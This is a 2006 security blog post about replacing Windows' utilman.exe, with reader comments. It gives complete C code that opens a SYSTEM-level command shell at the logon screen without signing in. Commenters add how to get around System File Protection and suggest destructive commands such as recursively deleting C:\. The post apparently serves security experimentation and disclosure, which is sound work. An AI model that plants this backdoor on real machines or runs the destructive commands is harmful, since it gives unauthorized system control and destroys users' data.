Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h> #include <windows.h> #include <tchar.h> void _tmain(void) { STARTUPINFO s; PROCESS_INFORMATION p; LPTSTR szCmdline = _tcsdup(TEXT("CMD")); LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon")); ZeroMemory(&s, sizeof(s)); s.cb = sizeof(s); s.lpDesktop = szDesktop; ZeroMemory(&p, sizeof(p)); CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p); CloseHandle(p.hProcess); CloseHandle(p.hThread); }
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
What user account does the shell run as? If it is system then their is a huge security hole.
Comment by Jay — Friday 1 September 2006 @ 14:14
It’s the SYSTEM account, read this: https://didierstevens.wordpress.com/2006/08/21/playing-with-utilmanexe/
Comment by Didier Stevens — Friday 1 September 2006 @ 16:28
It doesn’t matter on which desktop the cmd runs.
utilman.exe always runs as SYSTEM.
Nice man 😉
Comment by evilbitz — Friday 1 September 2006 @ 20:00
[…] For a demo of My second playdate with utilman.exe, go here on YouTube. […]
Pingback by Playing with utilman.exe, The Motion Picture « Didier Stevens — Tuesday 5 September 2006 @ 10:00
Hi, i compile you’re script with no error, replace in dllcache and system32, block sfc when prompt to restore, but when i press “Windows key” + U, nothing, you’re script in the 3 exemple work, but not the last with CMD.
Comment by Jacky — Wednesday 16 April 2008 @ 13:56
The example only works for me when
LPTSTR szDesktop = _tcsdup(TEXT(“WinSta0\\\\Winlogon”));
is replaced with
LPTSTR szDesktop = _tcsdup(TEXT(“WinSta0\\Winlogon”));
The \ has to be doubled (not quadrupled) for masking.
Comment by MF — Tuesday 6 October 2009 @ 7:03
Yes, \\ The \\\\ stems from an old issue with the PRE format in WordPress.
Comment by Didier Stevens — Tuesday 6 October 2009 @ 19:06
Wow i guess the best way to protect against this is either true crypt or replacing windows with linux? XD
This makes for some handy shortcuts i.e.
The nuke rd c:\ /s /q “why isnt my narrator working!? :P”
hide shutdown -s -f -t 00
Dude how about using you programming to make a visible firefox or better yet for those chronic pc gammers a lazy mans button to instantly launch a visble game while killing all unsanitary process…. ohh yess
Comment by dooshy — Tuesday 25 October 2011 @ 22:39